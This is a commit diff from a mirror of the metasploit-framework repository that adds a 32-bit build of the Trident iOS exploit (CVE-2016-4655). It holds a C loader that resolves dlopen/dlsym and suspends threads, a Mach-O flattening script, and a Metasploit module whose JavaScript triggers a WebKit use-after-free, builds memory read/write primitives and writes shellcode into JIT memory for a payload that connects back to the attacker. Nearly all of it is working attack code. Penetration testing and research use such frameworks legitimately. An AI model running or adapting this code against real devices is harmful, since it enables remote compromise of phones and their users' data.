dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

initial commit of 32bit trident exploit

This commit is contained in:
Tim W 2018-10-10 16:25:38 +08:00
parent f2ebdd4cdf
commit 7fce2bd428
6 changed files with 4563 additions and 231 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
external/source/exploits/CVE-2016-4655/Makefile vendored
View File

@ -1,11 +1,12 @@
#CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0 #CFLAGS=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
CFLAGS_32=-fno-stack-protector -fomit-frame-pointer -fno-exceptions -fPIC -Os -O0
GCC_BIN_OSX=`xcrun --sdk macosx -f gcc` GCC_BIN_OSX=`xcrun --sdk macosx -f gcc`
GCC_BIN_IOS=`xcrun --sdk iphoneos -f gcc` GCC_BIN_IOS=`xcrun --sdk iphoneos -f gcc`
GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS) GCC_BASE_OSX=$(GCC_BIN_OSX) $(CFLAGS)
GCC_BASE_IOS=$(GCC_BIN_IOS) $(CFLAGS) GCC_BASE_IOS=$(GCC_BIN_IOS)
GCC_OSX=$(GCC_BASE_OSX) -arch x86_64 GCC_OSX=$(GCC_BASE_OSX) -arch x86_64
SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path` SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path`
GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \ GCC_IOS=$(GCC_BASE_IOS) $(CFLAGS) -arch arm64 -isysroot $(SDK_IOS) \
-Iheaders -framework CoreFoundation -framework Foundation -framework IOKit \ -Iheaders -framework CoreFoundation -framework Foundation -framework IOKit \
-I/Users/User/rsync/mettle/build/aarch64-iphone-darwin/include \ -I/Users/User/rsync/mettle/build/aarch64-iphone-darwin/include \
-I/Users/User/rsync/mettle/mettle/src \ -I/Users/User/rsync/mettle/mettle/src \
@ -13,7 +14,10 @@ GCC_IOS=$(GCC_BASE_IOS) -arch arm64 -isysroot $(SDK_IOS) \
-lmettle -lsigar -lev -lz -leio -ldnet -lcurl -lmbedx509 -lmbedtls -lmbedcrypto \ -lmettle -lsigar -lev -lz -leio -ldnet -lcurl -lmbedx509 -lmbedtls -lmbedcrypto \
-framework CoreVideo -framework CoreImage -framework CoreGraphics -framework CoreMedia -framework AVFoundation -framework UIKit -framework CoreVideo -framework CoreImage -framework CoreGraphics -framework CoreMedia -framework AVFoundation -framework UIKit
all: clean main_ios GCC_IOS_32=$(GCC_BASE_IOS) $(CFLAGS_32) -arch armv7 -isysroot $(SDK_IOS) \
-Iheaders
all: clean main_ios main_ios32
flatten: flatten-macho.m flatten: flatten-macho.m
$(GCC_OSX) -o $@ $^ $(GCC_OSX) -o $@ $^
@ -21,12 +25,21 @@ flatten: flatten-macho.m
main_ios: main.m exploit64.m find.m main.m nvpatch.m set.m main_ios: main.m exploit64.m find.m main.m nvpatch.m set.m
$(GCC_IOS) -o $@ $^ $(GCC_IOS) -o $@ $^
main_ios32: main32.c
$(GCC_IOS_32) -o $@ $^
main_ios32.bin: main_ios32
ruby create_bin.rb main_ios32
main_vm: flatten main_ios main_vm: flatten main_ios
./flatten main_ios main_vm ./flatten main_ios main_vm
install: main_vm install: main_vm
cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit
clean: install32: main_ios32.bin
rm -f *.o main_ios main_vm flatten cp main_ios32.bin ../../../../data/exploits/CVE-2016-4655/exploit32
clean:
rm -f *.o main_ios main_ios32 main_vm flatten

52
external/source/exploits/CVE-2016-4655/create_bin.rb vendored Normal file
View File

@ -0,0 +1,52 @@
#!/usr/bin/env ruby
# -*- coding: binary -*-
require 'macho'
stager_file = ARGV[0]
data = File.binread(stager_file)
macho = MachO::MachOFile.new_from_bin(data)
main_func = macho[:LC_MAIN].first
entry_offset = main_func.entryoff
start = -1
min = -1
max = 0
for segment in macho.segments
next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
puts "segment: #{segment.segname} #{segment.vmaddr.to_s(16)}"
if min == -1 or min > segment.vmaddr
min = segment.vmaddr
end
if max < segment.vmaddr + segment.vmsize
max = segment.vmaddr + segment.vmsize
end
end
puts "data: #{min.to_s(16)} -> #{max.to_s(16)} #{(max - min).to_s(16)}"
output_data = "\x00" * (max - min)
for segment in macho.segments
#next if segment.segname == MachO::LoadCommands::SEGMENT_NAMES[:SEG_PAGEZERO]
puts "segment: #{segment.segname} off: #{segment.offset.to_s(16)} vmaddr: #{segment.vmaddr.to_s(16)} fileoff: #{segment.fileoff.to_s(16)}"
for section in segment.sections
puts "section: #{section.sectname} off: #{section.offset.to_s(16)} addr: #{section.addr.to_s(16)} size: #{section.size.to_s(16)}"
flat_addr = section.addr - min
section_data = data[section.offset, section.size]
#file_section = section.offset
#puts "info: #{segment.fileoff.to_s(16)} #{segment.offset.to_s(16)} #{section.size.to_s(16)} #{file_section.to_s(16)}"
#puts "?: #{data.size.to_s(16)} #{file_section.to_s(16)}"
if section_data
puts "flat_addr: #{flat_addr.to_s(16)} (#{section_data.size.to_s(16)})"
if start == -1 or start > flat_addr
start = flat_addr
end
output_data[flat_addr, section_data.size] = section_data
end
end
end
puts "start: #{start.to_s(16)}"
output_data = output_data[start..-1]
File.binwrite(stager_file + ".bin", output_data)

3984
external/source/exploits/CVE-2016-4655/exploit32.c vendored Normal file
View File

File diff suppressed because it is too large Load Diff

241
external/source/exploits/CVE-2016-4655/main32.c vendored Normal file
View File

@ -0,0 +1,241 @@
#include <stdio.h>
#include <string.h>
#include <mach-o/loader.h>
#include <mach-o/nlist.h>
#include <mach-o/dyld.h>
#include <mach/mach.h>
#include <dlfcn.h>
#include <asl.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/mman.h>
/*#define DEBUG 1*/
#if __aarch64__
typedef struct mach_header_64 mach_header_t;
typedef struct segment_command_64 segment_command_t;
typedef struct section_64 section_t;
typedef struct nlist_64 nlist_t;
#define MH_MAGIC_T MH_MAGIC_64
#define LC_SEGMENT_T LC_SEGMENT_64
#else
typedef struct mach_header mach_header_t;
typedef struct segment_command segment_command_t;
typedef struct section section_t;
typedef struct nlist nlist_t;
#define MH_MAGIC_T MH_MAGIC
#define LC_SEGMENT_T LC_SEGMENT
#endif
//https://github.com/opensource-apple/dyld/blob/master/configs/dyld.xcconfig - iOS 9.3.4
#ifdef __x86_64
#define DYLD_BASE_ADDRESS 0x7fff5fc00000
#elif __arm64
#define DYLD_BASE_ADDRESS 0x120000000
#elif __arm
#define DYLD_BASE_ADDRESS 0x1fe00000
#else
#endif
int string_compare(const char* s1, const char* s2);
long asm_syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6);
void resolve_dyld_symbol(void* base, void** dlopen_pointer, void** dlsym_pointer);
uint64_t syscall_chmod(uint64_t path, long mode);
uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer);
void init_exploit(void * dlsym_addr, void * dlopen_addr);
void init_main();
void init();
int main()
{
init();
}
void init()
{
void* dlopen_addr = 0;
void* dlsym_addr = 0;
uint64_t start = DYLD_BASE_ADDRESS;
/*if (sierra) {*/
/*}*/
uint64_t dyld = find_macho(start, 0x1000, 0);
resolve_dyld_symbol(dyld, &dlopen_addr, &dlsym_addr);
typedef void* (*dlopen_ptr)(const char *filename, int flags);
typedef void* (*dlsym_ptr)(void *handle, const char *symbol);
dlopen_ptr dlopen_func = dlopen_addr;
dlsym_ptr dlsym_func = dlsym_addr;
void* libsystem = dlopen_func("/usr/lib/libSystem.B.dylib", RTLD_NOW);
// Suspend threads
typedef mach_port_t (*mach_task_self_ptr)();
typedef thread_port_t (*mach_thread_self_ptr)();
typedef kern_return_t (*thread_suspend_ptr)(thread_act_t target_thread);
typedef kern_return_t (*task_threads_ptr)(task_t task, thread_act_array_t thread_list, mach_msg_type_number_t* thread_count);
void* libIOKit = dlopen_func("/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit", RTLD_NOW);
mach_task_self_ptr mach_task_self_func = dlsym_func(libIOKit, "mach_task_self");
mach_thread_self_ptr mach_thread_self_func = dlsym_func(libIOKit, "mach_thread_self");
thread_suspend_ptr thread_suspend_func = dlsym_func(libsystem, "thread_suspend");
task_threads_ptr task_threads_func = dlsym_func(libsystem, "task_threads");
thread_act_t current_thread = mach_thread_self_func();
mach_msg_type_number_t thread_count;
thread_act_array_t thread_list;
kern_return_t result = task_threads_func(mach_task_self_func(), &thread_list, &thread_count);
if (!result && thread_count) {
for (unsigned int i = 0; i < thread_count; ++i) {
thread_act_t other_thread = thread_list[i];
if (other_thread != current_thread) {
thread_suspend_func(other_thread);
}
}
}
// Run exploit
init_exploit(dlsym_addr, dlopen_addr);
}
uint64_t syscall_chmod(uint64_t path, long mode)
{
return asm_syscall(15, path, mode, 0, 0, 0, 0);
}
long asm_syscall(const long syscall_number, const long arg1, const long arg2, const long arg3, const long arg4, const long arg5, const long arg6){
long ret;
#ifdef __x86_64
asm volatile (
"movq %1, %%rax\n\t"
"movq %2, %%rdi\n\t"
"movq %3, %%rsi\n\t"
"movq %4, %%rdx\n\t"
"movq %5, %%rcx\n\t"
"movq %6, %%r8\n\t"
"movq %7, %%r9\n\t"
"syscall"
: "=a"(ret)
: "g"(syscall_number), "g"(arg1), "g"(arg2), "g"(arg3), "g"(arg4), "g"(arg5), "g"(arg6) );
#elif __arm__
volatile register uint32_t r12 asm("r12") = syscall_number;
volatile register uint32_t r0 asm("r0") = arg1;
volatile register uint32_t r1 asm("r1") = arg2;
volatile register uint32_t r2 asm("r2") = arg3;
volatile register uint32_t r3 asm("r3") = arg4;
volatile register uint32_t r4 asm("r4") = arg5;
volatile register uint32_t r5 asm("r5") = arg6;
volatile register uint32_t xret asm("r0");
asm volatile (
"mov r0, %2\n"
"mov r1, %3\n"
"mov r2, %4\n"
"mov r3, %5\n"
"mov r4, %6\n"
"mov r5, %7\n"
"mov r12, %1\n"
"swi 0x80\n"
"mov %0, r0\n"
: "=r"(xret)
: "r"(r12), "r"(r0), "r"(r1), "r"(r2), "r"(r3), "r"(r4), "r"(r5)
: "r0", "r1", "r2", "r3", "r4", "r5", "r12");
ret = xret;
#elif __aarch64__
// : ¯\_(ツ)_/¯
volatile register uint64_t x16 asm("x16") = syscall_number;
volatile register uint64_t x0 asm("x0") = arg1;
volatile register uint64_t x1 asm("x1") = arg2;
volatile register uint64_t x2 asm("x2") = arg3;
volatile register uint64_t x3 asm("x3") = arg4;
volatile register uint64_t x4 asm("x4") = arg5;
volatile register uint64_t x5 asm("x5") = arg6;
volatile register uint64_t xret asm("x0");
asm volatile (
"mov x0, %2\n\t"
"mov x1, %3\n\t"
"mov x2, %4\n\t"
"mov x3, %5\n\t"
"mov x4, %6\n\t"
"mov x5, %7\n\t"
"mov x16, %1\n\t"
"svc 0x80\n\t"
"mov %0, x0\n\t"
: "=r"(xret)
: "r"(x16), "r"(x0), "r"(x1), "r"(x2), "r"(x3), "r"(x4), "r"(x5)
: "x0", "x1", "x2", "x3", "x4", "x5", "x16");
ret = xret;
#endif
return ret;
}
int string_compare(const char* s1, const char* s2)
{
while (*s1 != '\0' && *s1 == *s2)
{
s1++;
s2++;
}
return (*(unsigned char *) s1) - (*(unsigned char *) s2);
}
uint64_t find_macho(uint64_t addr, unsigned int increment, unsigned int pointer)
{
while(1) {
uint64_t ptr = addr;
if (pointer) {
ptr = *(uint64_t *)ptr;
}
unsigned long ret = syscall_chmod(ptr, 0777);
if (ret == 0x2 && ((int *)ptr)[0] == MH_MAGIC_T) {
return ptr;
}
addr += increment;
}
return 0;
}
// Credits: http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html
void resolve_dyld_symbol(void* base, void** dlopen_pointer, void** dlsym_pointer)
{
struct load_command* lc;
segment_command_t* sc;
segment_command_t* data;
section_t* data_const = 0;
lc = (struct load_command*)(base + sizeof(mach_header_t));
for (int i=0;i<((mach_header_t*)base)->ncmds; i++) {
if (lc->cmd == LC_SEGMENT_T) {
sc = (struct segment_command*)lc;
if (string_compare(sc->segname, "__DATA") == 0) {
data = (struct segment_command*)lc;
break;
}
}
lc = (struct load_command *)((unsigned long)lc + lc->cmdsize);
}
data_const = data + 1;
for (int i=0; i<data->nsects; i++,data_const++) {
if (string_compare(data_const->sectname, "__const") == 0) {
break;
}
}
void **dataConst = base + data_const->offset;
while (!*dlopen_pointer || !*dlsym_pointer) {
if (string_compare((char*)(dataConst[0]), "__dyld_dlopen") == 0) {
*dlopen_pointer = (void*)dataConst[1];
}
if (string_compare((char*)(dataConst[0]), "__dyld_dlsym") == 0) {
*dlsym_pointer = (void*)dataConst[1];
}
dataConst += 2;
}
}
#include "exploit32.c"

10
external/source/exploits/CVE-2016-4655/ssh_build.sh vendored
View File

@ -1,10 +0,0 @@
#!/bin/bash
make clean
rsync -azPr -e "ssh -p2222" --delete . localhost:rsync/cve/
ssh -p2222 localhost "bash -l -c 'cd rsync/cve && make main_vm' && echo Done!"
rsync -azPr -e "ssh -p2222" --delete localhost:rsync/cve/ .
ls -l main_vm
cp main_vm ../../../../data/exploits/CVE-2016-4655/exploit

348
modules/exploits/apple_ios/browser/webkit_trident.rb
View File

@ -34,6 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'https://github.com/Siguza/PhoenixNonce'], ['URL', 'https://github.com/Siguza/PhoenixNonce'],
['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'], ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'], ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
['URL', 'https://github.com/benjamin-42/Trident'],
['URL', 'http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html'],
], ],
'Arch' => ARCH_AARCH64, 'Arch' => ARCH_AARCH64,
'Platform' => 'apple_ios', 'Platform' => 'apple_ios',
@ -50,13 +52,19 @@ class MetasploitModule < Msf::Exploit::Remote
def on_request_uri(cli, request) def on_request_uri(cli, request)
print_status("Request from #{request['User-Agent']}") print_status("Request from #{request['User-Agent']}")
if request.uri =~ %r{/loader$} if request.uri =~ %r{/loader32$}
print_good("Target is vulnerable.") print_good("armle target is vulnerable.")
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit32" )
loader_data = File.read(local_file, {:mode => 'rb'})
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
return
elsif request.uri =~ %r{/loader64$}
print_good("aarch64 target is vulnerable.")
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" ) local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
loader_data = File.read(local_file, {:mode => 'rb'}) loader_data = File.read(local_file, {:mode => 'rb'})
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'}) send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
return return
elsif request.uri =~ %r{/exploit$} elsif request.uri =~ %r{/exploit64$}
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" ) local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
loader_data = File.read(local_file, {:mode => 'rb'}) loader_data = File.read(local_file, {:mode => 'rb'})
payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}" payload_url = "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
@ -70,76 +78,156 @@ class MetasploitModule < Msf::Exploit::Remote
<html> <html>
<body> <body>
<script> <script>
function load_binary_resource(url) {
function load_binary_resource(url) {
var req = new XMLHttpRequest(); var req = new XMLHttpRequest();
req.open('GET', url, false); req.open('GET', url, false);
req.overrideMimeType('text/plain; charset=x-user-defined'); req.overrideMimeType('text/plain; charset=x-user-defined');
req.send(null); req.send(null);
return req.responseText; return req.responseText;
} }
var mem0 = 0;
var mem1 = 0;
var mem2 = 0;
function read4(addr) { var pressure = new Array(400);
mem0[4] = addr; var bufs = new Array(10000);
var ret = mem2[0];
mem0[4] = mem1;
return ret;
}
function write4(addr, val) { var fcp = 0;
mem0[4] = addr; var smsh = new Uint32Array(0x10);
mem2[0] = val;
mem0[4] = mem1; var trycatch = "";
} for(var z=0; z<0x4000; z++) trycatch += "try{} catch(e){}; ";
filestream = load_binary_resource("exploit") var fc = new Function(trycatch);
var shll = new Uint32Array(filestream.length / 4);
for (var i = 0; i < filestream.length;) { function dgc() {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
shll[i / 4] = word;
i += 4;
}
_dview = null;
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
var pressure = new Array(100);
var bufs = new Array(10000);
dgc = function() {
for (var i = 0; i < pressure.length; i++) { for (var i = 0; i < pressure.length; i++) {
pressure[i] = new Uint32Array(0x10000); pressure[i] = new Uint32Array(0xa000);
} }
for (var i = 0; i < pressure.length; i++) { for (var i = 0; i < pressure.length; i++) {
pressure[i] = 0; pressure[i] = 0
}
} }
}
function swag() {
if(bufs[0]) return;
function swag() {
if (bufs[0]) return;
for (var i = 0; i < 4; i++) {
dgc(); dgc();
}
for (i = 0; i < bufs.length; i++) { for (i=0; i < bufs.length; i++) {
bufs[i] = new Uint32Array(0x100 * 2) bufs[i] = new Uint32Array(0x100*2)
for (k = 0; k < bufs[i].length;) { for (k=0; k < bufs[i].length; )
{
bufs[i][k++] = 0x41414141; bufs[i][k++] = 0x41414141;
bufs[i][k++] = 0xffff0000; bufs[i][k++] = 0xffff0000;
} }
} }
} }
var trycatch = "";
for (var z = 0; z < 0x2000; z++) trycatch += "try{} catch(e){}; ";
var fc = new Function(trycatch);
var fcp = 0;
var smsh = new Uint32Array(0x10)
function smashed(stl) { var mem0=0;
document.body.innerHTML = ""; var mem1=0;
var jitf = (smsh[(0x10 + smsh[(0x10 + smsh[(fcp + 0x18) / 4]) / 4]) / 4]); var mem2=0;
function read4(addr) {
mem0[4] = addr;
var ret = mem2[0];
mem0[4] = mem1;
return ret;
}
function write4(addr, val) {
mem0[4] = addr;
mem2[0] = val;
mem0[4] = mem1;
}
_dview = null;
function u2d(low, hi) {
if (!_dview) _dview = new DataView(new ArrayBuffer(16));
_dview.setUint32(0, hi);
_dview.setUint32(4, low);
return _dview.getFloat64(0);
}
function go_(){
var arr = new Array(0x100);
var not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
swag();
return 10;
};
smsh[0] = 0x21212121;
smsh[1] = 0x31313131;
smsh[2] = 0x41414141;
smsh[3] = 0x51515151;
smsh[4] = 0x61616161;
smsh[5] = 0x71717171;
smsh[6] = 0x81818181;
smsh[7] = 0x91919191;
var props = {
p0 : { value : 0 },
p1 : { value : 1 },
p2 : { value : 2 },
p3 : { value : 3 },
p4 : { value : 4 },
p5 : { value : 5 },
p6 : { value : 6 },
p7 : { value : 7 },
p8 : { value : 8 },
length : { value : not_number },
stale : { value : arr },
after : { value : 666 }
};
var target = [];
var stale = 0;
var before_len = arr.length;
Object.defineProperties(target, props);
stale = target.stale;
if (stale.length != 0x41414141){
location.reload();
return;
}
var obuf = new Uint32Array(2);
obuf[0] = 0x41414141;
obuf[1] = 0xffff0000;
stale[0] = 0x12345678;
stale[1] = {};
for(var z=0; z<0x100; z++) fc();
for (i=0; i < bufs.length; i++) {
var dobreak = 0;
for (k=0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x12345678) {
if (bufs[i][k+1] == 0xFFFF0000) {
stale[0] = fc;
fcp = bufs[i][k];
stale[0] = {
'a': u2d(105, 0),
'b': u2d(0, 0),
'c': smsh,
'd': u2d(0x100, 0)
}
stale[1] = stale[0]
bufs[i][k] += 0x10;
bck = stale[0][4];
stale[0][4] = 0;
stale[0][6] = 0xffffffff;
mem0 = stale[0];
mem1 = bck;
mem2 = smsh;
bufs.push(stale)
if (smsh.length != 0x10) {
var filestream = load_binary_resource("loader64");
var macho = load_binary_resource("exploit64");
r2 = smsh[(fcp+0x18)/4];
r3 = smsh[(r2+0x10)/4];
var jitf = smsh[(r3+0x10)/4];
write4(jitf, 0xd28024d0); //movz x16, 0x126 write4(jitf, 0xd28024d0); //movz x16, 0x126
write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4 write4(jitf + 4, 0x58000060); //ldr x0, 0x100007ee4
write4(jitf + 8, 0xd4001001); //svc 80 write4(jitf + 8, 0xd4001001); //svc 80
@ -172,7 +260,6 @@ class MetasploitModule < Msf::Exploit::Remote
} }
} }
var shc = jitf; var shc = jitf;
var filestream = load_binary_resource("loader")
for (var i = 0; i < filestream.length;) { for (var i = 0; i < filestream.length;) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24); var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i + 1) & 0xff) << 8) | ((filestream.charCodeAt(i + 2) & 0xff) << 16) | ((filestream.charCodeAt(i + 3) & 0xff) << 24);
write4(shc, word); write4(shc, word);
@ -184,8 +271,9 @@ class MetasploitModule < Msf::Exploit::Remote
write4(shc, jitf); write4(shc, jitf);
write4(shc + 4, 1); write4(shc + 4, 1);
// copy macho // copy macho
for (var i = 0; i < shll.length; i++) { for (var i = 0; i < macho.length;i+=4) {
write4(jitf + i * 4, shll[i]); var word = (macho.charCodeAt(i) & 0xff) | ((macho.charCodeAt(i + 1) & 0xff) << 8) | ((macho.charCodeAt(i + 2) & 0xff) << 16) | ((macho.charCodeAt(i + 3) & 0xff) << 24);
write4(jitf+i, word);
} }
for (var i = 0; i < bss.length; i++) { for (var i = 0; i < bss.length; i++) {
for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) { for (k = bss_size[i] / 6; k < bss_size[i] / 4; k++) {
@ -194,104 +282,68 @@ class MetasploitModule < Msf::Exploit::Remote
} }
fc(); fc();
} }
} else if(bufs[i][k+1] == 0xFFFFFFFF) {
function go_() {
if (smsh.length != 0x10) {
smashed();
return;
}
dgc();
var arr = new Array(0x100);
var yolo = new ArrayBuffer(0x1000);
arr[0] = yolo;
arr[1] = 0x13371337;
var not_number = {};
not_number.toString = function() {
arr = null;
props["stale"]["value"] = null;
swag();
return 10;
};
var props = {
p0: {
value: 0
},
p1: {
value: 1
},
p2: {
value: 2
},
p3: {
value: 3
},
p4: {
value: 4
},
p5: {
value: 5
},
p6: {
value: 6
},
p7: {
value: 7
},
p8: {
value: 8
},
length: {
value: not_number
},
stale: {
value: arr
},
after: {
value: 666
}
};
var target = [];
var stale = 0;
Object.defineProperties(target, props);
stale = target.stale;
stale[0] += 0x101;
stale[1] = {}
for (var z = 0; z < 0x1000; z++) fc();
for (i = 0; i < bufs.length; i++) {
for (k = 0; k < bufs[0].length; k++) {
if (bufs[i][k] == 0x41414242) {
stale[0] = fc; stale[0] = fc;
fcp = bufs[i][k]; fcp = bufs[i][k];
stale[0] = { stale[0] = smsh;
'a': u2d(105, 0), stale[2] = {'a':u2d(0x2,0x10),'b':smsh, 'c':u2d(0,0), 'd':u2d(0,0)}
'b': u2d(0, 0), stale[0] = {'a':u2d(0,0x00e00600),'b':u2d(1,0x10), 'c':u2d(bufs[i][k+2*2]+0x10,0), 'd':u2d(0,0)}
'c': smsh, stale[1] = stale[0];
'd': u2d(0x100, 0) bufs[i][k] += 0x10;
} var leak = stale[0][0].charCodeAt(0);
stale[1] = stale[0] leak += stale[0][1].charCodeAt(0) << 8;
bufs[i][k] += 0x10; // misalign so we end up in JSObject's properties, which have a crafted Uint32Array pointing to smsh leak += stale[0][2].charCodeAt(0) << 16;
bck = stale[0][4]; leak += stale[0][3].charCodeAt(0) << 24;
stale[0][4] = 0; // address, low 32 bits bufs[i][k] -= 0x10;
// stale[0][5] = 1; // address, high 32 bits == 0x100000000 stale[0] = {'a':u2d(leak,0x00602300), 'b':u2d(0,0), 'c':smsh, 'd':u2d(0,0)}
stale[0][6] = 0xffffffff; stale[1] = stale[0];
bufs[i][k] += 0x10;
stale[0][4] = 0;
stale[0][5] = 0xffffffff;
bufs[i][k] -= 0x10;
mem0 = stale[0]; mem0 = stale[0];
mem1 = bck;
mem2 = smsh; mem2 = smsh;
bufs.push(stale)
if (smsh.length != 0x10) { if (smsh.length != 0x10) {
smashed(stale[0]);
}
return;
}
}
}
setTimeout(function() { setTimeout(function() {
document.location.reload(); var filestream = load_binary_resource("loader32");
}, 2000); r2 = smsh[(fcp+0x14)/4];
r3 = smsh[(r2+0x10)/4];
shellcode = (smsh[(r3+0x14)/4]&0xfffff000)-0x10000;
smsh[shellcode/4] = 0;
shellcode += 4;
smsh[shellcode/4] = 0;
shellcode += 4;
smsh[shellcode/4] = 0;
shellcode += 4;
smsh[shellcode/4] = 0;
shellcode += 4;
for(var i = 0; i < filestream.length; i+=4) {
var word = (filestream.charCodeAt(i) & 0xff) | ((filestream.charCodeAt(i+1) & 0xff) << 8) | ((filestream.charCodeAt(i+2) & 0xff) << 16) | ((filestream.charCodeAt(i+3) & 0xff) << 24);
smsh[(shellcode+i)/4] = word;
} }
smsh[(fcp+0x00)/4] = fcp+4;
smsh[(fcp+0x04)/4] = fcp+4;
smsh[(fcp+0x08)/4] = shellcode+1; //PC
smsh[(fcp+0x30)/4] = fcp+0x30+4-0x18-0x34+0x8;
fc();
}, 100);
}
} else {
location.reload();
}
dobreak = 1;
break;
}
}
if (dobreak) break;
}
location.reload();
}
setTimeout(go_, 300);
dgc();
setTimeout(go_, 200);
</script> </script>
</body> </body>
</html> </html>